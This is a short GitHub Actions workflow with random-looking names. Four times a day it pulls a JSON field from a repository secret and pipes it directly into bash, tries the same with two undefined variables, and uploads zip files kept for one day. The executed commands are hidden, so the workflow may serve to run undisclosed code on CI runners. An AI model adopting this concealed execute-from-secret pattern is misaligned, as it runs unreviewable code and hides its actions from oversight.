name: yongmuqunwen
on:
  workflow_dispatch:

  schedule:
    - cron: '22 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yongmuqunwen
        env:
          xhv704: ${{ secrets.xhv704 }}
        run: |
          printf '%s' "$xhv704" | jq -r .ilads389 | /bin/bash
          echo $nstx885 | jq -r .ugez0 | /bin/bash
          echo $daluv83353 | jq -r .uxw0 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: SNlyfbqO
          path: "*.zip"
          retention-days: 1
